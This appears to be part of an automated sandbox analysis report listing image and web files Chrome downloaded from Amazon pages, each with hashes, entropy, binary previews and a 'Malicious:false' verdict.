                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".................................................................!.1"2AQq....46rs....#3RTa.......5BCUu....$DSbe....dt..................................................!1..ARa.Qq.2"...3B.#..............?........:....Ems4QC...*B..Wn.j.m..h.^:...g.....K.m.j....u.../ .d..A..T.3...../.\2..._........|...s..7.J...........eh..7......7...W.nu.uy.P.|...K ..r...\#o..W...z...>.y:....S..>.....?.I.i.;J..3..L.t.....7..sZ..w.p...em;N..i..w.....,9L...>Mev%VC..nM.MwZ..8.\.6v.| .\o.s:...3......z...qq...[3}...\.K..).r.r.n.....G.~*....{....D...6...q.;..8..y.g.iZ...%..0..~i..7W.RUw...........k..u?....<B9.w...?..k..........k........N.lY...y...Z.../.K.y...Z.../.Mz..{.7.Xi...P..$....I ...?..0..u\JGT.........DU[.y...Z.../.K.y...Z.../.E..=......J/l..P.$_.<......)g...?..?K....g.]j.9..=.K....dbX.....<.Z.Uc=..J ...&o..7E...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):30188
                                                                                                                                                                                                                                                                      Entropy (8bit):7.937716010500813
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:E/QDYcbAKXRq2uauY7cdGqyo2beFYhtVYBZOGpYv2Rtz:lE4AKcyuYiGqFFYhtVYzLpQ2Rp
                                                                                                                                                                                                                                                                      MD5:A697ED9F5CF9599064F0E91E5EE51C41
                                                                                                                                                                                                                                                                      SHA1:2DCF94A4BCDC608635DAE8498C5E4A69FF5135A7
                                                                                                                                                                                                                                                                      SHA-256:BC4F870F1CC64DB166D9CFA06089E0F6586C0EE17B2801689D9314E23BE63854
                                                                                                                                                                                                                                                                      SHA-512:A0C7305EE75F50E8F45CCB7695DAA3556EA22DC16BFAA0653242CD76164C651332191E934162A8FF533365696127F6FE072A6C5055C6D49FC47087B46495BBE5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/2407GH040_AE_PD23_GW_Devices_bubbler_Amazondevices__400x400_EN._CB567012733_.jpg
                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d...........................................................................................................!..1A."2Qa..#Uq....3BRrtu........$%45678Tbces......CESW.......'Dd.&FV...Gv.........................!1..2AQRq......"3Sa.....Br....#4b....%C.............?.......@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(..........@.P(.....@.P(...g3.A..8...%I._...|.P.u....}..p.'.{.n..\......x;..i..s.....0..q_..R......gr...SM..."{[.hk.(bS.P>IM.N!..\.(.>.P.~.K[...w.O..m...W..t..o.#..Ov.]Z...G..7....W>..lS.lF....?q5."..?..`..U[T.WG...Uw.....\.U.>)......!..5.73.._._......wO......W....hTN.4w......77.{.lt..SDu..?.r3c.6.*.)......~..:#.<S.^"t..M.&[m..;J..j>..X..+R..p.....O...fvMQ..d....TBn.u...9.J\...#........r..kW.....ak....JdI.mZ...Q..f...*..1.l....~MK.#.N..'.&wh.Zj....NQ...y.X.P....q..E.IET....nX.G....X....@.P(.....@
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x80, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):5298
                                                                                                                                                                                                                                                                      Entropy (8bit):7.54538099097088
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:1rorvCLJujWGkVg2pFQiNk8MxPmfs/pzEvA/:1Erm3+kFQiN9MxPmfch
                                                                                                                                                                                                                                                                      MD5:9D84E6E09C1C952575ABB4CF9C7ADB4E
                                                                                                                                                                                                                                                                      SHA1:82384F82C73346576F30E549181070DA1CFF8B0F
                                                                                                                                                                                                                                                                      SHA-256:22B87B6934425E5F1668D8D00F358A1C4B527818175418D47855A362BF563092
                                                                                                                                                                                                                                                                      SHA-512:F549730726AB4BFC0D59536D7325D355E1A49404177BF379A55DF7CC9A3179ADCA5CE9E8D06ECD4C2E4F0DDEF7F99DE19ECD83E74EC515E1624EF0CD4605592C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........P...."......................................................................3a....................................N07ek.........................8.].......@'._.87w.v.D.......g........................>.....~.`......Gx.n...>.R.h.H..C.!..........l^...............Z.q.......j..5...\..I.r.....*.B.D...........x.........:..+.....-.WZt....O........j.}B.=Y........................~......................................l~.......................3........................................................5..........n...`...............*@.......................................................D....................SB.4^../ ..........'...3zl..ZE.M...................v........$...........W...*..........................2.6`.57...4p. ..........fky,...b.Y.1f,...b.Y.1f,...b.Y.1f,...b.Y.1f,...b.Y.1f,...b.Y.1f,...b.Y.1f,...b.Y.1f,...b
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):36397
                                                                                                                                                                                                                                                                      Entropy (8bit):7.93171690168982
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:/UM4UpfB1X+rZ8VpjefP6HjUha739q/RwEST5/zQhC:/UdUpzOopqfyD996TST5d
                                                                                                                                                                                                                                                                      MD5:879548148F6432CF0DA1564ABB796C3D
                                                                                                                                                                                                                                                                      SHA1:15F6FA844D6CAB6E5140E3AA27FAF0C9ABDAFE36
                                                                                                                                                                                                                                                                      SHA-256:EF12A4762D3DFC753A30406B50E4C7CED5A279A14E0646BD945337BC1B3159B8
                                                                                                                                                                                                                                                                      SHA-512:A78C5206026A183787B5F42A616A55724C9DB100D51C4E214FF23000D1CF6FEB3EA609A152CE401C7879CDA6A950E00AB6924326617FCD89FB26ECBB2B69D86F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d............................................................................................................!.1..A"Qa..2q...#BV.....$38Rbr.....C..stuv......%46........7FSTcd..............................!1..2AQRaq......"S.....Br..#3....4Cb...$............?.......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(...?........P..@(......P..@(...>....@Y....+.EH..,:..............0..?..:2k..^.dg..b*p`.]..w...$..".....V.t.....B.......g.p.[..S].O .....,;...j*E.H!.......Cm'..a..=...........78.....-;....$C.j...(....Yq.?E{.....).......'......s|....?..1.....B;...7...4d,....}.._../........?.=_[....?....|..x...e.}-J...Z.....K.vP........\.3.^$._..o.Av|I8.v.C?.....r..2]R.[..E.|Mv....'R. \..i..m.eg..?.k.....Nk._...{...JK..^..........]d~3....Hq.......=...d..4m...579/.?z.K........M...q...F......Mkx...1...+..O2.E...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 207x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):8590
                                                                                                                                                                                                                                                                      Entropy (8bit):7.946247791594697
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:QyJbJBj/cfgB+35ltDGIe+jlzKmYAIUHRUTgdN4TTE3moaYvYIhG:3bj/cfgcT1he+jUmYAiTgdNUE2LYwIhG
                                                                                                                                                                                                                                                                      MD5:F832B2305F9F78038CB08623B334A53D
                                                                                                                                                                                                                                                                      SHA1:85556AA4C3FCE3403C747467195A2CA1A013DA8D
                                                                                                                                                                                                                                                                      SHA-256:644A30E692D729B374E40A2464FB3976E0BD2D049DAA7005E98E3CDB14C97D8E
                                                                                                                                                                                                                                                                      SHA-512:93633FB1E672B9259D435A917B93135DB79DE2B546F43E687736ED183A85723E98683B40C3CD96F8E742CE997A5EF32EB025D92CF63409D227B21E41AFE1B4A4
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1..AQ.."23aq.6Rrst.....5B...#4CS...%Db..$......................................................1.!2AQq."C..#$34Babr........5R..............?..tQE..QE..QE..T[^..F.$0..q..K....O......=.b..+....L..UI.&[.U.s.DY.......T~..oQ`...-U..Wx.:....m...s../.X#.!j`..win9..}..j/S..q.|..R.p.nP...8..s.....'>...X.)..'..H..JFo......7.....Z..%s.:u....=...I{;k..0.....n.......K....ik6..M.7.).O...z...".V..Y....m......4.....F..sT~..................T=..m...M.I?)..B?.j.\...W>../.p........ln.....S.r4'B.[._k/gwt..$.1Y[..!\.&..c..Q..g...=.&..8N.cWV.(....aE.S..QE..QE..QE...6.k..$..>3Q..m...k.>3Q..n^l.......B.(....Q@.M.[.._i.......e.E..l.....~..2.X..F.5.@.D.(......Z...ST..9r9M_...x....So.E+....ElV.if...V.B}.....'...SE..o..$....iz)..S[lsU..T.n.kl...M..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):45586
                                                                                                                                                                                                                                                                      Entropy (8bit):7.950808394191532
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:06v0kmNf8ZdcLACzPc7Q393J2Nz7WcZd+9JocWu6dNa5O1b0WN9UBEg:Lckuf+cLACzCQ39wNz71b+AcWJbvLU5
                                                                                                                                                                                                                                                                      MD5:3AE5AA5A2C5501CC6D4921D38DAC3DDD
                                                                                                                                                                                                                                                                      SHA1:DC0E4CD7B9042CEB27172606320505368EEE9147
                                                                                                                                                                                                                                                                      SHA-256:BCE0914795C0599032033394B79F4AD372F852B51E1E204D0C902E0AA175D35C
                                                                                                                                                                                                                                                                      SHA-512:5C430451AAF4DB2BA6CE61E0912BAD5BA8F485E9496CC7C6E41D8C059AE6C748B7944BC86944BF877A8B99E8251A72540778FBE5BB50505726877D5AEE96104B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d.............................................................................................................!1"A..Qa..#2BUq...3Rr...b..$67CScst......Eu.....%8DT.....45dv........................!..1AQ..aq...."2R......BSr...#3b...4..$%5C...T............?....@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@......@(......P..@(......P..@;u=..f..M.a*M....S.C....[..+k..8...95..].....S.0k..v....ju..EM2..?{.J.......l.'.u...........|.....J..).i. }.$.+..6........G...l4..S.F=+.O].H....>[Yuj..t..[(r;....._.*:.....z......~e....`...J.2<...l...|I...........?`{.Hc...S.L.....E.K.z./.{O........$?.2*...............lzAq).9..?.r3c...\..=.....c..w....=&5.D...t....y.......`..n..3..~..hJ/c....%..*.M.N...NE..?r..?.V.."..*...{.....o............&.yK..3.L.G.%~Jc..J...l`.....J]O.c;.j.5...n.'(...y.p}..p..s..."..!(...5.(T..E.^.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 263x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):9697
                                                                                                                                                                                                                                                                      Entropy (8bit):7.918237953021372
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:DxST6TJHnaHOF4F9N7fONLGo2kVuxZJaQ7niH7WytoH8na8h5u1pz86jTqgEa9ua:Dx46TJHaK4zN7WhGo2kVuxmV5ocnauoZ
                                                                                                                                                                                                                                                                      MD5:D98B924EE121960013B2762FAFBF2AB9
                                                                                                                                                                                                                                                                      SHA1:4A07413CF5488E90CA7012E5202690A2A2C985EB
                                                                                                                                                                                                                                                                      SHA-256:23E8B7B263102F26A37343CD9507B52BAAA3939460B2AB07D8BE87D1190AA16E
                                                                                                                                                                                                                                                                      SHA-512:7AE8CA22F84656F79029B44BD70AA771BDBCD1FF5631C2FB089A707838A3157EE2A7C41CC9EA8E0D5F8CF1D8A8F0BB1D4E69875A57FBB3E60987136246038FE2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5.....................................................................|.f<f.....x5yS..M.6.O.~.g.jv.-kt..........B.......G;..a9O..........m 6.Q...........D...."...WT[.....|..O.u.u..{1....l........@......&.p6!.6id..%vR.j.K]..>.?...]......5...q.k..5.fu&.......8....NA..c...?.Y.F..Z.Cp......?fs...u...lt2....]9...6n....4kyh+3............k....U.KN-./...Md.]...`.\z)^5[.J.QgS..\6O...}4e.......g...Gk..k.y.%Y.....j.......RW..bX.ZrD.9.1.../..dCf@........>tB ..q.,.6.vs+..2.L.d5.b7^.x.j...7&"hw......A..o.=.6........,6j?.Df......f.H..d}..../Xv{....h/.fd+..$x.W..x,x.....~..........D%.,.L Vm=....Y..'!....~..A.v.M.Q.../....x?.A...b.......b...q.$;..u-.G..b[..wD.g5.f.c.8.D .W...g..'./"f..x2S.s.c..]@.......}"....u....,.C.6.....&-..RK"..y.L...03xL.....F..7Q..=./3....u.9>}.#.<.@.Q......2..].PB{..../`Jl.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 750x300, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):22580
                                                                                                                                                                                                                                                                      Entropy (8bit):7.950920212016055
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:1Hi5BCbgEVZmf77tICPCj5blY6kg4WNVHTr/qLbAFF8sSebiqpAncNY6n3RIFE8J:1H/bgKZmf9ajtjkIHS4ssFbiquwnn3R4
                                                                                                                                                                                                                                                                      MD5:C6E265540102A513CC86F19209B2828A
                                                                                                                                                                                                                                                                      SHA1:D827D610A62BDD1219F14D37984DC17CF9B1A113
                                                                                                                                                                                                                                                                      SHA-256:DD82410C41CCEF9AA847A04D2FB7953F7A0DD12E81E34FD79CE3D7EC74AE2433
                                                                                                                                                                                                                                                                      SHA-512:B17B77D76C3DC08BF0982BB7D1D623C3CD1647E901AFB9A8DAE5F51502AD06D164EA5B8255A83AEC776914D25F2696D42B2658913973D022B100E63F9F08D898
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/L2-Top-brands-Head-750x300.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........,...."........................................................................................y...i.w9..............j8./.. ................5.G.............P...C.d{..y./t............k'..}0..a.......D.o......B...e..d..;g.]..................j9M,h.7.U)O4..]..K.a.|.........q....Qt .....;W....L...v\.&..V.6.>.M.3.g._..E....5..'..n..x......?!.....4:`....zL.2B...........................]...G..s...icl...l..>.6m...r]...R5.;......~F.......O..C..D..C...|M4:.Pe].N..#..z.0......\.....P...{...tn;...|...J)..$W.>.}.@.\..|.g3.]tjR6...q.f.....x.!.p"f...QJr..k.]..y/.=.`.i.C....."u.E..K..>...............K`y.\W..m.-..uc...`.....MlL......_.rUP.......~....-...n.m.T...#_\W.U.1q..G.Ce.....q.?Bu.T..8.........qk.ZO..s.V...F...u.5v.....]>.-..mv9.{.kP....=.N.....#.{.F..n...o.{.Q.....yu.8.tR6..;....;.|?......T..........gb.vkr#.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):40020
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9551893853251725
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:xAVzpMOWNDsMJYQHx6NM4XHwVqRrOlIzSgLefko5F:6vjWvJHR6O4XZxVOg9of
                                                                                                                                                                                                                                                                      MD5:42D0F71A6F1E012DA438A3AEE9D3C788
                                                                                                                                                                                                                                                                      SHA1:A75BE3F6FFA269EA4A997368B0B149CA77850101
                                                                                                                                                                                                                                                                      SHA-256:C1CB80139DC20B88E17E79579244CB890929527034C9464D2162A3CFF30409A9
                                                                                                                                                                                                                                                                      SHA-512:8C6DF2EF4B686C9B38A15FC804D7D868C30FF4B59C6A8A0FA0F260063B65C8C85A19E3D8A6C44EF4ADF869BDAA5E1E373A30AE75F10EA244CDF15CBED0A8760B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C............................................................................"...........................................Q..............................!.."1..#AQ..2UX..Raq.....$&'(B.347..59EHfuv.........................................R..........................!..1.."AQ.aq..#2....$%...&4BDRbc...36CEUVt.TXdesu.................?..C...1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1..:.6.d...b...mzj.m..9.P...v=yY..gbS.<|dse.9H..D..RUc...H..@..I:...{...Ps..8.....q..h.$...;.{.......e}1]..G.+.?..7..UK.M..5..."S...K..%..).^I}b.3NR........0i=.=._ ..[..a.vP......w.........A..Ub<...^E...V...J...oX.L.x.........G~(s...0.2kc..B...J Q.....!=e=2..@...T.2.9.#..E..d`9n..r.#..F*,_;h.R'l...4b..t.*x...............Z..u.oZ...@....W.sns.~s.p.Q..X4.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):71
                                                                                                                                                                                                                                                                      Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                      MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                      SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                      SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                      SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.amazon.ae/rd/uedata?rid=SX0TR1HXR3TVBG1JQK3B&sid=261-8635865-4706955&rx=M2coE1XcaAXL0EdMA642dw
                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 91x90, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):978
                                                                                                                                                                                                                                                                      Entropy (8bit):7.7929026074761
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:24:0D41C3iNm5kblwqXS3lvoxOR7mcXCS1k3J6p5r4qUo+BF:W41C3iNm2XS3lvmImcSSG324qUo+BF
                                                                                                                                                                                                                                                                      MD5:95BD6FE838D5BBA90DA2DC9B9A67D41F
                                                                                                                                                                                                                                                                      SHA1:CC3957744DC6069315394A484A8B4EE3BF276C17
                                                                                                                                                                                                                                                                      SHA-256:BB36C0FC740A3A08E97B9A8550A86C39B25C093AC5EDA93534EED537094AF026
                                                                                                                                                                                                                                                                      SHA-512:29995F6108BA527CCB0866FCA81C0C20BA1416622C07BF197520006F1683634F18FAE49A2989A44E253F4191C61D6916EA98D36C78B7F66DCD4664F7B857C2DA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/81BY-cAOlCL._AC_QL10_SX728_SY90_FMwebp_.jpg
                                                                                                                                                                                                                                                                      Preview:RIFF....WEBPVP8 .........*[.Z.?...Z.'$/).K1.1.....=.$........O.Q..5....9.e.X.?..x......;.n^..'.."...}.....-4\.I.O.Z.yqg]+...q..4.I..#<.....o.e!%.ek.l..F..|r.\..\J.BzT.30.?..k...._.2,Wnw..PQ.:.z.......D....@C..\`..1Z.....=*..C...d.z..;Ln.|u.A........)..X.c7E......C#.@....p...e.......3.vO.....Vw......ew......p6......b......;.....O.......`.m...,......m.E.O.R..#..F...q...b`.D...-zS..Z.9k..&..."YY.,..Yk..S\..eh^..q`...;..g./.:..\..|......r....7*..P5U...... ..Pp..L$.+kd.].g2..=.+8."...+..q!....w.N...H...............J..bh,..?.Z....d.;jo.h.(.}....];.n.....b.mm.l.....D)K>M.i.....SM...x]5%..\.Q..x...`..[...0.B.n_c1.w.r.!NN.vG..W.........F.3..o..50E.1...{.....1..e.#..^...Z..xx..*....n..Ot.n.C......6A.b\.b....bW...6..S.mV.w.9.......6E>.Q.n.M...e;J.h..m..=1....].k..v.s...k....I..(h...)k...I6..u..O.....)....z..?.n}K........."...?.._...po....A.X.j..l....;*.aXB...q...7.l........j.T9...9.%..i.....a=.b~..D.7..,.X.^.<........!...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                                                                                                                      Entropy (8bit):4.017824858003425
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:kY4L4NKbvn:kY4EIn
                                                                                                                                                                                                                                                                      MD5:734930DCDBA2810CE73FE5069CC19669
                                                                                                                                                                                                                                                                      SHA1:81CAF1CBA98DBEAF1A9E7640B0B85071D099254C
                                                                                                                                                                                                                                                                      SHA-256:38956056E9E4D8C6798025989C602B9287F3B4477754CEBD04A48520E9490377
                                                                                                                                                                                                                                                                      SHA-512:DD2B4AF207BE550370A4B6E1780AF00C78BA68318F30C4DA5AF1F231B7E045DFF62CDDFD5FDA63C716A70CD6EEFE0C5C012262DA0AACD2E8E6718DECBB6C3A5E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:<UnknownOperationException/>.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):16512
                                                                                                                                                                                                                                                                      Entropy (8bit):7.909359572145559
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:Xd7BXwC7iDqnvhces8levhPN8B6Mbo/XzoJkCaX9:X9Li2nvMAevhPNlQAXzoJknX9
                                                                                                                                                                                                                                                                      MD5:E0A8226C061C30BF348BAF0E57E9A769
                                                                                                                                                                                                                                                                      SHA1:4C8DF7E08855244B91AB54C8E8DAA62255ECE5E5
                                                                                                                                                                                                                                                                      SHA-256:02F11DD56EFFA707702F8EAE9CABF0EB5F6AEA65373F3CD0F296EEBA1AE45C75
                                                                                                                                                                                                                                                                      SHA-512:EF0CEB669426CF96F7277BE660BC250055E50EF1DA2B44F9C67E59D479843CDA819BD7EA50C23975E8E6D7D3229E5949E51AA6E79AE8FE16ECD077C278B970F7
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/414Wkl-jqYL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5.................................................................................................'.!.......W..v..w.L..^~..~.~......'..?.....O....>?...w.................j..7?K.~r....W.....U.GV~m..*.....#...|...6'........vH~.....~................hM...y..(...]w\U.,...&..........'..e...V..6.............h7..k$R.G...K.O_{\U.nh.bl........k.g...r."..O.=...............9.m$R.c.'.K.O_{^W...NB^.#.....v.....3.,...Os......................Hc.X..5r........p.K.e....LK.y.s.B..G................y.i.y.a.&.M.K].ZU.,...&...wu.K.U..Hd-I..]..|..............=....<3#.(.+.\...k...0..^R..}...g&..KrC)_}..............9..69..y.cZz.-^.VT.J.j.........O5y.r.)...A..............s..6ls."8....:....^Z.j..P.l'.94..-...;...=...............9..XdE.q..\.j.z..i..by..[.B.~.K$.+N\.......=...............9..XzE.q..T.j.z..Y..1.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):93021
                                                                                                                                                                                                                                                                      Entropy (8bit):7.66918235578333
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:4K0ckbn8ymIxL40ZMFXHWaERdtILuE//OLQOzC7Xaw3cJavB3jwsPwBe4dH:4K0cz+xLXMhH7OELuEYzCXd3cA52BZ
                                                                                                                                                                                                                                                                      MD5:0E1C526E038916BC7AFECF63CC78992D
                                                                                                                                                                                                                                                                      SHA1:14A3899906EE181AEC233A096033842BF3E9119C
                                                                                                                                                                                                                                                                      SHA-256:716F8B0BBFEE916278AB306652110061C54A0CDA6A4EF87F8D27E83F14E469BB
                                                                                                                                                                                                                                                                      SHA-512:20BDACD6D9F34C81FB3D140FDC4BF4A04DCF173FC13638B4E8AA316418957FC8819D9CD517A4482B8BD107FDFA8B8B9CB9AF0D6F5A22E8020EEE6AE8F7A4124A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):51019
                                                                                                                                                                                                                                                                      Entropy (8bit):7.967231046283993
                                                                                                                                                                                                                                                                      Encrypted:false
